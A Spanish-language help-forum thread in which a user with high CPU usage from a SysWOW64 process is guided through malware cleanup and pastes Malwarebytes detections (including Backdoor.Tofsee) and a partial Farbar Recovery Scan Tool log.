Svchost.exe en SysWOW64 siempre me consume el 50% del CPU

#1

hola buenas, no sé si sea un problema de la PC creo que sí porque el archivo del titulo ya lleva 1 semana consumiendo 50% del CPU como sale en la imagen, he buscado aqui mismo en este foro problemas similares y no me he atrevido a hacer mucho por tratarse de un archivo que puede ser legítimo del sistema, la verdad es que me parece un malware porque no creo que sea normal que siempre este asi. Gracias de atemano.

#2

Hola @ricardo4e

Bienvenido a esta nueva etapa de InfoSpyware…!!!

Realiza lo siguiente para descartar infección:

1.- Desactiva temporalmente tu antivirus y cualquier programa de seguridad.

2.- Descarga, instala y/o actualiza a las siguientes herramientas:

3.- Ejecutas respetando el orden los pasos:

CCleaner

Lo ejecutas usando su opción Limpiador de acuerdo su Manual:

  • Para borrar Cookies, temporales de Internet y todos los archivos que este te muestre como obsoletos.
  • NO necesitamos este reporte

AdwCleaner

Lo ejecutas.

  • Pulsa en el botón Escanear y espera a que se realice el proceso. Luego pulsa sobre el botón Limpiar.
  • Espera a que se complete. Si te pidiera reiniciar el sistema Aceptas.
  • Guarda el reporte que le aparecerá para copiarlo y pegarlo en tu próxima respuesta.
  • El informe también puede encontrarse en “C:\AdwCleaner\AdwCleaner.txt”

Malwarebytes

  • No olvides actualizarlo.
  • Lee detenidamente su Manual
  • Realiza un Análisis Personalizado marcando todas las unidades
  • Pulsa en “Eliminar Seleccionados” para enviar lo encontrado a la cuarentena.
  • Reinicias el Sistema.
  • En el apartado del manual “Historial” >> Registros de Aplicación >> Scan Log/Registro de Análisis encontrarás el informe del MBAM, que debes copiar y pegar en tu próxima respuesta.

4.- Nota Importante:

En tu próxima respuesta debes pegar los reportes de AdwCleaner y Malwarebytes.

Guía: ¿Como Pegar reportes en el Foro?

Nos comentas.

Salu2

#3

Hola gracias por tu respuesta,

Antes de ayer le volvi a pasar el Malwarebytes anti malware y encontro amenazas despues en modo a prueba de fallos limpie el ordenador con el ccleaner y ya no volvio el proceso a ejecutarse mas, de todas formas pego el informe de los scans.

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 2/25/19
Scan Time: 7:56 PM
Log File: 562b47e8-3961-11e9-847f-b8aeed393719.json

-Software Information-
Version: 3.7.1.2839
Components Version: 1.0.538
Update Package Version: 1.0.9442
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Michael-PC\Michael

-Scan Summary-
Scan Type: Custom Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 275025
Threats Detected: 7
Threats Quarantined: 7
Time Elapsed: 13 min, 37 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 1
Backdoor.Tofsee, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\qhpduwip, Quarantined, [4005], [642953],1.0.9442

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 6
Backdoor.Tofsee, C:\WINDOWS\SYSWOW64\QHPDUWIP\YTAXWTPQ.EXE, Quarantined, [4005], [642953],1.0.9442
Adware.FileTour, C:\USERS\MICHAEL\APPDATA\LOCAL\TEMP\IMAGINGENGINE.DLL\15314\IC64.DLL, Quarantined, [437], [641561],1.0.9442
Trojan.MalPack, C:\USERS\MICHAEL\APPDATA\LOCAL\TEMP\DETMZBUPYYD\BCN.EXE, Quarantined, [529], [642854],1.0.9442
Spyware.PasswordStealer, C:\USERS\MICHAEL\APPDATA\LOCAL\TEMP\W3VVOLE2YR3\EBAY.EXE, Quarantined, [469], [641353],1.0.9442
Adware.Zdengo, C:\WINDOWS\LCPDXGSADXF.LCP, Quarantined, [496], [642690],1.0.9442
Rootkit.Agent.PUA, C:\WINDOWS\9B7FA4AB85B9.SYS, Quarantined, [418], [638809],1.0.9442

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)

Gracias por atenderme siempre busco ayuda aqui ud son lo maximo :smiley:

#4

Hola:

Gracias a ti por confiar en Forospyware!!!

Faltaría que pegues el reporte de AdwCleaner.

Salu2.

#5

hola, no se si pueda recuperar ese log porque le pase el Delfix :confused: creo que tendria que utilizar algun programa que recupere archivos borrados o algo asi porque no encuentro la carpeta C:\AdwCleaner

#6

Hola:

No debes apurarte ni hacer pasos que no te indicamos, ya fue desinstalado AdwCleaner.

Realiza lo siguiente:

1.- Desactiva temporalmente tu antivirus y cualquier programa de seguridad.

2.- Descarga Farbar Recovery Scan Tool. en el escritorio, seleccionando la versión adecuada para la arquitectura (32 o 64bits) de su equipo. >> Como saber si mi Windows es de 32 o 64 bits.?

  • Ejecuta FRST.exe.
  • En el mensaje de la ventana del Disclaimer, pulsamos Yes
  • En la ventana principal pulsamos en el botón Scan y esperamos a que concluya el proceso.
  • Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

Guía: Como Ejecutar FRST

3.- En tu próxima respuesta, pega los reportes generados.

Guía : ¿Como Pegar reportes en el Foro?

Esperamos esos reporte.

Salu2

#7

hola, aqui van los logs

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28.02.2019 01
Ran by Michael (administrator) on MICHAEL-PC (01-03-2019 14:01:44)
Running from C:\Users\Michael\Desktop
Loaded Profiles: Michael (Available Profiles: Michael)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Español (España, internacional)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Scarlet.Crush Productions) [File not signed] C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe
(DT Soft Ltd -> DT Soft Ltd) C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
(Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [112512 2010-03-13] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601928 2018-12-15] (Oracle America, Inc. -> Oracle Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [1305408 2011-01-05] (DT Soft Ltd -> DT Soft Ltd)
HKLM\Software\...\AppCompatFlags\InstalledSDB\{ad846bae-d44b-4722-abad-f7420e08bcd9}: [DatabasePath] -> C:\Windows\AppPatch\Custom\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb [2016-11-29]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.119\Installer\chrmstp.exe [2019-02-25] (Google LLC -> Google Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.40\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{34EE306A-D3DE-4A29-8B15-95DDDAC6CC6A}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/es-xl/?ocid=iehp
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2019-02-02] (Oracle America, Inc. -> Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-02-02] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
Handler: ms-help - {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll [2008-05-23] (Microsoft Corporation) [File not signed]
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Windows -> Microsoft Corporation)

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2019-02-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2019-02-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-15] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-15] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-03-21] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [File not signed]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-03-21] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [File not signed]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-20] (Google Inc -> Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-20] (Google Inc -> Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-01-31] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default [2019-03-01]
CHR Extension: (Presentaciones) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-20]
CHR Extension: (Documentos) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-20]
CHR Extension: (Google Drive) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-20]
CHR Extension: (YouTube) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-20]
CHR Extension: (Hojas de cálculo) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-20]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-20]
CHR Extension: (AdBlock) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2019-02-25]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-20]
CHR Extension: (Gmail) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-20]
CHR Extension: (Chrome Media Router) - C:\Users\Michael\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-20]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [389632 2016-01-10] (Scarlet.Crush Productions) [File not signed]
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Trusted Connect Service -> Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-15] (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation)
S2 KMService; C:\Windows\SysWOW64\srvany.exe [8192 2019-02-02] () [File not signed]
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [254528 2018-12-05] (DT Soft Ltd -> DT Soft Ltd)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2019-02-23] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-15] (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation)
R3 MotioninJoyXFilter; C:\Windows\System32\DRIVERS\MijXfilt.sys [121416 2012-05-12] (Shenzhen Saikeware Technology Co., Ltd. -> MotioninJoy)
R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-03-01 14:01 - 2019-03-01 14:02 - 000014308 _____ C:\Users\Michael\Desktop\FRST.txt
2019-03-01 14:01 - 2019-03-01 14:01 - 000000000 ____D C:\FRST
2019-03-01 14:00 - 2019-03-01 14:01 - 002434048 _____ (Farbar) C:\Users\Michael\Desktop\FRST64.exe
2019-02-28 17:04 - 2019-02-28 17:04 - 000000000 ____D C:\Users\Michael\AppData\Local\Jagex
2019-02-28 17:04 - 2019-02-28 17:04 - 000000000 ____D C:\ProgramData\Jagex
2019-02-25 22:31 - 2019-02-25 22:31 - 354670792 _____ C:\Windows\system32\Limpio.reg
2019-02-25 20:31 - 2019-02-25 20:31 - 000001534 _____ C:\Windows\ntbtlog.txt
2019-02-25 20:19 - 2019-02-25 20:19 - 000001940 _____ C:\Users\Michael\Desktop\Malwarebytes Scan25-02-19.txt
2019-02-25 19:47 - 2019-02-25 19:47 - 000000000 ____D C:\ProgramData\Nefarius Software Solutions
2019-02-25 19:20 - 2019-02-25 20:38 - 000000664 _____ C:\DelFix.txt
2019-02-25 19:20 - 2019-02-25 19:20 - 000000000 ____D C:\Windows\ERUNT
2019-02-23 23:50 - 2019-02-23 23:50 - 000000982 _____ C:\Windows\SysWOW64\SysWOW64 - Acceso directo.lnk
2019-02-23 23:12 - 2019-02-23 23:12 - 000020076 _____ C:\Users\Michael\Desktop\Scan 23-2-19.txt
2019-02-23 21:24 - 2019-02-23 21:24 - 000000000 ____D C:\Users\Michael\AppData\Local\mbamtray
2019-02-23 21:24 - 2019-02-23 21:24 - 000000000 ____D C:\Users\Michael\AppData\Local\mbam
2019-02-23 21:23 - 2019-02-23 21:23 - 000001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-23 21:23 - 2019-02-23 21:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-23 21:23 - 2019-02-23 21:23 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-23 21:23 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-02-23 21:16 - 2013-03-29 15:22 - 000000878 _____ C:\Users\Michael\Desktop\Malwarebytes Anti-Malware.txt
2019-02-23 21:15 - 2019-02-23 21:23 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-23 21:15 - 2019-02-23 21:23 - 000000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2019-02-23 21:15 - 2013-01-02 20:03 - 010156344 _____ (Malwarebytes Corporation ) C:\Users\Michael\Desktop\mbam-setup-1.70.0.1100.exe
2019-02-23 17:36 - 2019-02-23 17:36 - 000000161 _____ C:\Users\Michael\Desktop\Nuevo documento de texto.txt
2019-02-23 17:19 - 2014-12-08 07:34 - 403800064 _____ C:\Users\Michael\Desktop\Biohazard - Outbreak - File 2 (Japan).iso
2019-02-23 17:16 - 2014-12-08 07:34 - 403800064 _____ C:\Users\Michael\Downloads\Biohazard - Outbreak - File 2 (Japan).iso
2019-02-23 17:12 - 2019-02-23 17:12 - 000000422 __RSH C:\ProgramData\ntuser.pol
2019-02-23 17:11 - 2019-02-23 17:11 - 000098400 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\system32\libusbK.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000083552 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\SysWOW64\libusbK.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000076384 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\system32\libusb0.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000067680 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\SysWOW64\libusb0.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 000047200 _____ (hxxp://libusb-win32.sourceforge.net) C:\Windows\system32\Drivers\libusbK.sys
2019-02-23 17:07 - 2019-02-23 17:07 - 000003894 _____ C:\Windows\System32\Tasks\updater
2019-02-23 17:07 - 2019-02-23 17:07 - 000001223 _____ C:\Users\Public\Desktop\ScpToolkit Driver Installer.lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000001188 _____ C:\Users\Public\Desktop\ScpToolkit Settings Manager.lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000001188 _____ C:\Users\Public\Desktop\ScpToolkit Profile Manager.lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000001183 _____ C:\Users\Public\Desktop\ScpToolkit Updater.lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000001183 _____ C:\Users\Public\Desktop\ScpToolkit Monitor (legacy).lnk
2019-02-23 17:07 - 2019-02-23 17:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit
2019-02-23 17:07 - 2019-02-23 17:07 - 000000000 ____D C:\Program Files\Nefarius Software Solutions
2019-02-23 17:06 - 2019-02-23 17:06 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Nefarius Software Solutions
2019-02-23 17:05 - 2019-02-23 17:06 - 023361996 _____ (Nefarius Software Solutions) C:\Users\Michael\Downloads\ScpToolkit_Setup.exe
2019-02-22 00:03 - 2019-02-22 00:02 - 2325150616 _____ C:\Users\Michael\Downloads\Biohazard - Outbreak - File 2 (Japan).7z
2019-02-21 23:11 - 2019-02-21 23:11 - 000377694 _____ C:\Users\Michael\Desktop\gpupeopssoftwin118b.zip
2019-02-21 23:07 - 2019-02-21 23:07 - 000175318 _____ C:\Users\Michael\Desktop\gpupeteogl209.zip
2019-02-21 17:46 - 2019-02-21 17:46 - 000000177 _____ C:\Users\Public\Desktop\RuneScape Launcher.url
2019-02-21 17:46 - 2019-02-21 17:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jagex
2019-02-21 17:46 - 2019-02-21 17:46 - 000000000 ____D C:\Program Files\Jagex
2019-02-20 23:48 - 2019-02-20 23:48 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Disabled Startup
2019-02-20 23:40 - 2019-02-25 19:42 - 000002222 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-20 23:40 - 2019-02-25 19:42 - 000002181 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-02-20 23:13 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\t4nb0jos5lf
2019-02-20 23:05 - 2019-02-20 23:21 - 000000000 ____D C:\Program Files (x86)\RegSeeker
2019-02-20 23:05 - 2019-02-20 23:19 - 000000979 _____ C:\Users\Michael\Downloads\CCleaner.lnk
2019-02-20 23:05 - 2019-02-20 23:05 - 000002798 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2019-02-20 23:05 - 2019-02-20 23:05 - 000001023 _____ C:\Users\Michael\Downloads\RegSeeker.lnk
2019-02-20 23:05 - 2019-02-20 23:05 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RegSeeker
2019-02-20 23:05 - 2019-02-20 23:05 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Babylon
2019-02-20 23:05 - 2019-02-20 23:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegSeeker
2019-02-20 23:05 - 2019-02-20 23:05 - 000000000 ____D C:\ProgramData\Babylon
2019-02-20 23:04 - 2019-02-25 20:38 - 000000000 ____D C:\Program Files (x86)\Trend Micro
2019-02-20 23:04 - 2019-02-20 23:05 - 000000000 ____D C:\Program Files\CCleaner
2019-02-20 23:04 - 2019-02-20 23:04 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HiJackThis
2019-02-20 23:03 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\mwp5plgzgye
2019-02-20 22:58 - 2019-02-20 22:58 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ytvjbkdd0kq
2019-02-20 22:32 - 2019-02-20 22:32 - 000000000 ____D C:\ProgramData\boost_interprocess
2019-02-20 22:28 - 2019-02-20 22:28 - 000000000 ____D C:\Users\Michael\AppData\Local\Deployment
2019-02-20 22:28 - 2019-02-20 22:28 - 000000000 ____D C:\Users\Michael\AppData\Local\Apps\2.0
2019-02-20 22:26 - 2019-02-25 20:19 - 000000000 ____D C:\Windows\SysWOW64\qhpduwip
2019-02-20 22:26 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\5fgtl00uoz1
2019-02-20 22:21 - 2019-02-20 22:21 - 000000011 _____ C:\Users\Michael\setup24.ini
2019-02-20 22:20 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ex5jjx0e11b
2019-02-20 22:20 - 2019-02-20 22:21 - 006161408 _____ C:\Users\Michael\AppData\Local\dump007.dat
2019-02-20 22:20 - 2019-02-20 22:20 - 000000009 _____ C:\Users\Michael\rstr4.ini
2019-02-20 22:12 - 2019-02-20 22:15 - 005939464 _____ (Jagex Ltd ) C:\Users\Michael\Downloads\RuneScape-Setup.exe
2019-02-20 22:08 - 2019-02-23 23:14 - 000000000 ____D C:\Users\Michael\AppData\Local\Maurice
2019-02-20 22:07 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\xazbrsguaeb
2019-02-20 22:03 - 2019-02-20 22:03 - 000003578 _____ C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150}
2019-02-20 22:03 - 2019-02-20 22:03 - 000003472 _____ C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863}
